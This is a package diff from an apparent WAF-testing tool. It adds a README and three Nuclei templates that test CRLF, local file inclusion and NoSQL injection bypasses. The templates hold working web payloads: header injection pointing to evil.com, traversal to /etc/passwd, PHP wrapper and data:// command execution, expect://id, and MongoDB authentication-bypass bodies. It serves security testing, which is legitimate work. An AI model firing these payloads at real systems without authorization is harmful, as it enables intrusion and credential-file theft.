@waftester/cli 2.8.0

package/templates/README.md

@@ -0,0 +1,221 @@
+# Templates
+
+Pre-built templates for WAF security testing, reporting, CI/CD integration, and scan configuration.
+
+## Directory Structure
+
+```
+templates/
+├── nuclei/                      # Nuclei-compatible YAML scanning templates
+│   ├── http/
+│   │   ├── waf-bypass/          # WAF bypass detection templates
+│   │   └── waf-detection/       # WAF vendor fingerprinting
+│   └── workflows/               # Conditional scan chains
+├── workflows/                   # Multi-step scan orchestration
+├── policies/                    # CI/CD pass/fail gate policies
+├── overrides/                   # Test override configurations
+├── output/                      # Go text/template output formats
+└── report-configs/              # HTML report theme/layout configs
+```
+
+---
+
+## Nuclei Templates
+
+Nuclei-compatible YAML templates for WAF bypass testing and detection.
+
+### WAF Bypass Templates (`nuclei/http/waf-bypass/`)
+
+| Template | Severity | Description |
+|----------|----------|-------------|
+| `sqli-basic.yaml` | Critical | Basic SQL injection bypass tests |
+| `sqli-evasion.yaml` | Critical | SQLi with evasion (case alt, comments, encoding) |
+| `xss-basic.yaml` | High | Basic XSS bypass tests |
+| `xss-evasion.yaml` | High | XSS with encoding and tag mutation |
+| `rce-bypass.yaml` | Critical | Command injection with evasion |
+| `lfi-bypass.yaml` | High | Path traversal / LFI bypass |
+| `ssrf-bypass.yaml` | High | SSRF with IP encoding tricks |
+| `ssti-bypass.yaml` | Critical | Server-side template injection |
+| `crlf-bypass.yaml` | Medium | CRLF header injection |
+| `xxe-bypass.yaml` | Critical | XML external entity injection |
+| `nosqli-bypass.yaml` | High | NoSQL injection (MongoDB operators) |
+
+### WAF Detection Templates (`nuclei/http/waf-detection/`)
+
+| Template | Description |
+|----------|-------------|
+| `cloudflare-detect.yaml` | Cloudflare WAF fingerprinting |
+| `aws-waf-detect.yaml` | AWS WAF / Shield detection |
+| `akamai-detect.yaml` | Akamai Kona Site Defender |
+| `modsecurity-detect.yaml` | ModSecurity / OWASP CRS |
+| `azure-waf-detect.yaml` | Azure Front Door / Azure WAF |
+
+### Nuclei Workflows (`nuclei/workflows/`)
+
+| Workflow | Description |
+|----------|-------------|
+| `waf-assessment-workflow.yaml` | Detect WAF then run all bypass templates |
+
+### Usage
+
+```bash
+# Run a single template
+waf-tester nuclei -t templates/nuclei/http/waf-bypass/sqli-basic.yaml -u https://example.com
+
+# Run all bypass templates
+waf-tester nuclei -t templates/nuclei/http/waf-bypass/ -u https://example.com
+
+# Run the full assessment workflow
+waf-tester nuclei -t templates/nuclei/workflows/waf-assessment-workflow.yaml -u https://example.com
+```
+
+---
+
+## Workflow Templates
+
+Multi-step scan orchestration YAML files for common assessment patterns.
+
+| Workflow | Description |
+|----------|-------------|
+| `full-scan.yaml` | Complete: detect, learn, scan, report (HTML + SARIF) |
+| `quick-probe.yaml` | Fast WAF detection + critical vulnerability probe |
+| `ci-gate.yaml` | CI/CD security gate with policy enforcement |
+| `waf-detection.yaml` | WAF detection + fingerprinting + behavior probing |
+| `api-scan.yaml` | API-focused assessment (SQLi, NoSQLi, SSRF, JWT, GraphQL) |
+
+### Usage
+
+```bash
+waf-tester workflow run templates/workflows/full-scan.yaml \
+  --input target=https://example.com \
+  --input output_dir=./results
+```
+
+---
+
+## Policy Templates
+
+CI/CD pass/fail gate policies defining bypass thresholds and effectiveness requirements.
+
+| Policy | Strictness | Effectiveness | Use Case |
+|--------|------------|---------------|----------|
+| `permissive.yaml` | Low | 60%+ | Development environments |
+| `standard.yaml` | Medium | 85%+ | General assessments |
+| `strict.yaml` | High | 95%+ | Production security gates |
+| `owasp-top10.yaml` | High | 90%+ | OWASP Top 10 compliance |
+| `pci-dss.yaml` | Maximum | 99%+ | PCI DSS 4.0 compliance |
+
+### Usage
+
+```bash
+waf-tester run -u https://example.com --policy templates/policies/strict.yaml
+```
+
+---
+
+## Override Templates
+
+Test override configurations for customizing scan behavior.
+
+| Override | Description |
+|----------|-------------|
+| `false-positive-suppression.yaml` | Skip known false positive triggers |
+| `api-only.yaml` | Skip browser-specific tests for JSON APIs |
+| `crs-tuning.yaml` | Tuned for OWASP CRS environments |
+
+### Usage
+
+```bash
+waf-tester run -u https://api.example.com --overrides templates/overrides/api-only.yaml
+```
+
+---
+
+## Output Format Templates
+
+Go `text/template` files for custom output formatting. Full Sprig function library available.
+
+| Template | Format | Description |
+|----------|--------|-------------|
+| `asff.tmpl` | JSON | AWS Security Hub Finding Format (ASFF) |
+| `csv.tmpl` | CSV | Comma-separated values export |
+| `text-summary.tmpl` | Text | Human-readable summary with severity icons |
+| `markdown-report.tmpl` | Markdown | Full report in Markdown tables |
+| `slack-notification.tmpl` | JSON | Slack Block Kit notification payload |
+| `junit.tmpl` | XML | JUnit test report for CI/CD systems |
+
+### Usage
+
+```bash
+# Use a file template
+waf-tester run -u https://example.com --template templates/output/markdown-report.tmpl
+
+# Pipe to Slack
+waf-tester run -u https://example.com --template templates/output/slack-notification.tmpl \
+  | curl -X POST -H 'Content-Type: application/json' -d @- $SLACK_WEBHOOK
+```
+
+### Template Data
+
+Templates have access to these fields:
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `.ScanID` | string | Unique scan identifier |
+| `.Target` | string | Target URL |
+| `.Timestamp` | string | RFC3339 timestamp |
+| `.Duration` | float64 | Scan duration in seconds |
+| `.TotalTests` | int | Total tests run |
+| `.Blocked` | int | Tests blocked by WAF |
+| `.BypassCount` | int | Bypasses detected |
+| `.Errors` | int | Error count |
+| `.Effectiveness` | float64 | WAF effectiveness percentage |
+| `.Grade` | string | Letter grade (A+, A, B, etc.) |
+| `.Results[]` | array | All test results |
+| `.Bypasses[]` | array | Only bypass results |
+| `.SeverityCounts` | map | Bypass counts by severity |
+| `.CategoryCounts` | map | Bypass counts by category |
+
+Custom functions: `escapeCSV`, `escapeXML`, `severityIcon`, `json`, `prettyJSON`, `owaspLink`, `cweLink`, plus the full [Sprig](http://masterminds.github.io/sprig/) library.
+
+---
+
+## Report Template Configs
+
+HTML report theme and layout configurations.
+
+| Config | Theme | Description |
+|--------|-------|-------------|
+| `minimal.yaml` | Light | Condensed essential findings |
+| `enterprise.yaml` | Light | Full-featured enterprise report |
+| `dark.yaml` | Dark | Dark theme for presentations |
+| `compliance.yaml` | Light | Compliance-focused with evidence |
+| `print.yaml` | Light | Print/PDF optimized, grayscale |
+
+### Usage
+
+```bash
+waf-tester scan https://example.com --html report.html \
+  --template-config templates/report-configs/dark.yaml
+```
+
+### Custom Configs
+
+Copy any config and customize. All available options:
+
+- **Branding**: Company name, logo, colors, footer
+- **Layout**: Theme (light/dark/auto), page width, TOC, compact mode
+- **Sections**: Enable/disable any report section
+- **Styling**: Fonts, colors, border radius, custom CSS
+- **Charts**: Radar/bar/line charts, color palette, animation
+- **Export**: Default format, allowed formats, raw data embedding
+
+---
+
+## Contributing Templates
+
+1. Follow the Nuclei template format for scanning templates
+2. Include `id`, `info.name`, `info.author`, `info.severity`, `info.description`, and `info.tags`
+3. Use descriptive filenames matching the template ID
+4. Add your template to the appropriate subdirectory
+5. Update this README with the new template

package/templates/nuclei/http/waf-bypass/crlf-bypass.yaml

@@ -0,0 +1,146 @@
+id: waf-crlf-bypass
+info:
+  name: WAF CRLF Injection Bypass
+  author: waftester
+  severity: medium
+  description: |
+    Tests WAF effectiveness against CRLF injection and HTTP response splitting
+    bypass techniques. Covers URL-encoded CRLF, Unicode CRLF variants, HTTP
+    header injection, Set-Cookie injection, Location header manipulation,
+    and response body injection via header splitting.
+  reference:
+    - https://owasp.org/www-community/vulnerabilities/CRLF_Injection
+    - https://portswigger.net/kb/issues/00200200_http-response-header-injection
+    - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection
+    - https://github.com/0xInfection/Awesome-WAF
+  tags: crlf,waf,bypass,header-injection,response-splitting,waftester
+  classification:
+    cwe-id:
+      - CWE-93
+      - CWE-113
+      - CWE-693
+  metadata:
+    verified: true
+    max-request: 16
+    shodan-query: "http.waf"
+    fofa-query: "header=\"WAF\""
+
+http:
+  # Standard CRLF injection - Set-Cookie via URL
+  - method: GET
+    path:
+      - "{{BaseURL}}/%0d%0aSet-Cookie:injected=true"
+      - "{{BaseURL}}/%0d%0aSet-Cookie:%20injected=true%0d%0a"
+      - "{{BaseURL}}/?redirect=%0d%0aSet-Cookie:injected=true"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "Set-Cookie: injected"
+          - "injected=true"
+        condition: or
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406 && status_code != 429"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+          - "Request Rejected"
+        negative: true
+        condition: or
+
+    extractors:
+      - type: kval
+        kval:
+          - set-cookie
+
+  # Location header injection - open redirect via CRLF
+  - method: GET
+    path:
+      - "{{BaseURL}}/?redirect=%0d%0aLocation:%20http://evil.com"
+      - "{{BaseURL}}/%0d%0aLocation:%20http://evil.com%0d%0a"
+      - "{{BaseURL}}/?url=%0d%0aLocation:http://evil.com"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "Location: http://evil.com"
+        condition: or
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # Unicode CRLF variants - bypass URL-encoding filters
+  - method: GET
+    path:
+      - "{{BaseURL}}/%E5%98%8A%E5%98%8DSet-Cookie:injected=true"
+      - "{{BaseURL}}/%E5%98%8A%E5%98%8D%E5%98%8ASet-Cookie:%20injected=true"
+      - "{{BaseURL}}/%c4%8d%c4%8aSet-Cookie:injected=true"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # Response body injection via double CRLF
+  - method: GET
+    path:
+      - "{{BaseURL}}/%0d%0a%0d%0a<script>alert(1)</script>"
+      - "{{BaseURL}}/?q=%0d%0a%0d%0a<html><body>injected</body></html>"
+      - "{{BaseURL}}/%0d%0a%0d%0a{\"injected\":true}"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # Host header injection via CRLF
+  - method: GET
+    path:
+      - "{{BaseURL}}/%0aHost:evil.com"
+      - "{{BaseURL}}/%0d%0aHost:evil.com%0d%0a"
+      - "{{BaseURL}}/%0d%0aX-Forwarded-Host:evil.com"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or

package/templates/nuclei/http/waf-bypass/lfi-bypass.yaml

@@ -0,0 +1,152 @@
+id: waf-lfi-bypass
+info:
+  name: WAF Local File Inclusion Bypass
+  author: waftester
+  severity: high
+  description: |
+    Tests WAF effectiveness against path traversal and local file inclusion
+    bypass techniques. Covers standard traversal, double encoding, null byte
+    injection, PHP wrappers, Windows-specific paths, UTF-8 encoding tricks,
+    and glob pattern bypasses used against Sucuri and other WAFs.
+  reference:
+    - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/05-Authorization_Testing/01-Testing_Directory_Traversal_File_Include
+    - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal
+    - https://github.com/0xInfection/Awesome-WAF
+  tags: lfi,traversal,waf,bypass,owasp-a01,path-traversal,waftester
+  classification:
+    cwe-id:
+      - CWE-22
+      - CWE-98
+      - CWE-693
+  metadata:
+    verified: true
+    max-request: 22
+    shodan-query: "http.waf"
+    fofa-query: "header=\"WAF\""
+
+http:
+  # Standard path traversal variations
+  - method: GET
+    path:
+      - "{{BaseURL}}/?file=../../../etc/passwd"
+      - "{{BaseURL}}/?file=....//....//....//etc/passwd"
+      - "{{BaseURL}}/?file=..%2f..%2f..%2fetc%2fpasswd"
+      - "{{BaseURL}}/?file=..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts"
+      - "{{BaseURL}}/?file=..%c0%af..%c0%af..%c0%afetc/passwd"
+      - "{{BaseURL}}/?file=..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "root:"
+          - "/bin/bash"
+          - "/bin/sh"
+          - "localhost"
+        condition: or
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406 && status_code != 429"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+          - "Request Rejected"
+        negative: true
+        condition: or
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*?:[0-9]+:[0-9]+"
+
+  # Double URL encoding
+  - method: GET
+    path:
+      - "{{BaseURL}}/?file=..%252f..%252f..%252fetc%252fpasswd"
+      - "{{BaseURL}}/?file=%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd"
+      - "{{BaseURL}}/?file=..%25252f..%25252f..%25252fetc%25252fpasswd"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # Null byte injection and extension bypass
+  - method: GET
+    path:
+      - "{{BaseURL}}/?file=/etc/passwd%00.jpg"
+      - "{{BaseURL}}/?file=/etc/passwd%00.png"
+      - "{{BaseURL}}/?file=../../../etc/passwd%00index.html"
+      - "{{BaseURL}}/?file=....//etc/passwd%00.pdf"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # PHP wrapper and filter chain bypasses
+  - method: GET
+    path:
+      - "{{BaseURL}}/?file=php://filter/convert.base64-encode/resource=../../../etc/passwd"
+      - "{{BaseURL}}/?file=php://filter/read=string.rot13/resource=../../../etc/passwd"
+      - "{{BaseURL}}/?file=php://filter/zlib.deflate/convert.base64-encode/resource=../../../etc/passwd"
+      - "{{BaseURL}}/?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg=="
+      - "{{BaseURL}}/?file=expect://id"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # Glob pattern bypasses (effective against Sucuri WAF)
+  - method: GET
+    path:
+      - "{{BaseURL}}/?file=/?in/cat+/et?/passw?"
+      - "{{BaseURL}}/?file=/???/??t+/???/??????"
+      - "{{BaseURL}}/?file=/e]t[c/p]a[s]s[wd"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or

package/templates/nuclei/http/waf-bypass/nosqli-bypass.yaml

@@ -0,0 +1,166 @@
+id: waf-nosqli-bypass
+info:
+  name: WAF NoSQL Injection Bypass
+  author: waftester
+  severity: high
+  description: |
+    Tests WAF effectiveness against NoSQL injection bypass techniques. Targets
+    MongoDB operator injection, JavaScript injection, JSON body manipulation,
+    regex-based authentication bypass, CouchDB injection, and query operator
+    abuse via both GET parameters and POST JSON bodies.
+  reference:
+    - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection
+    - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection
+    - https://book.hacktricks.xyz/pentesting-web/nosql-injection
+    - https://github.com/0xInfection/Awesome-WAF
+  tags: nosqli,waf,bypass,mongodb,couchdb,owasp-a03,injection,waftester
+  classification:
+    cwe-id:
+      - CWE-943
+      - CWE-693
+  metadata:
+    verified: true
+    max-request: 18
+    shodan-query: "http.waf"
+    fofa-query: "header=\"WAF\""
+
+http:
+  # MongoDB operator injection via query params
+  - method: GET
+    path:
+      - "{{BaseURL}}/?username[$ne]=&password[$ne]="
+      - "{{BaseURL}}/?username[$gt]=&password[$gt]="
+      - "{{BaseURL}}/?username[$regex]=.*&password[$regex]=.*"
+      - "{{BaseURL}}/?username[$nin][]=admin&password[$ne]="
+      - "{{BaseURL}}/?username[$exists]=true&password[$exists]=true"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200 || status_code == 302"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+          - "Request Rejected"
+        negative: true
+        condition: or
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "(?i)(token|session|jwt|auth|welcome|dashboard)"
+
+  # MongoDB JSON body injection - authentication bypass
+  - method: POST
+    path:
+      - "{{BaseURL}}/api/login"
+    headers:
+      Content-Type: "application/json"
+    body: '{"username":{"$ne":""},"password":{"$ne":""}}'
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406 && status_code != 429"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # MongoDB regex auth bypass
+  - method: POST
+    path:
+      - "{{BaseURL}}/api/login"
+    headers:
+      Content-Type: "application/json"
+    body: '{"username":{"$regex":"admin.*"},"password":{"$regex":".*"}}'
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # JavaScript injection in MongoDB $where
+  - method: POST
+    path:
+      - "{{BaseURL}}/api/search"
+    headers:
+      Content-Type: "application/json"
+    body: '{"$where":"this.username == this.password"}'
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # MongoDB $where with sleep for time-based detection
+  - method: POST
+    path:
+      - "{{BaseURL}}/api/search"
+    headers:
+      Content-Type: "application/json"
+    body: '{"$where":"sleep(3000)"}'
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or
+
+  # MongoDB aggregation pipeline injection
+  - method: POST
+    path:
+      - "{{BaseURL}}/api/data"
+    headers:
+      Content-Type: "application/json"
+    body: '[{"$lookup":{"from":"users","localField":"_id","foreignField":"_id","as":"leaked"}}]'
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code != 403 && status_code != 406"
+      - type: word
+        part: body
+        words:
+          - "403"
+          - "Forbidden"
+          - "blocked"
+        negative: true
+        condition: or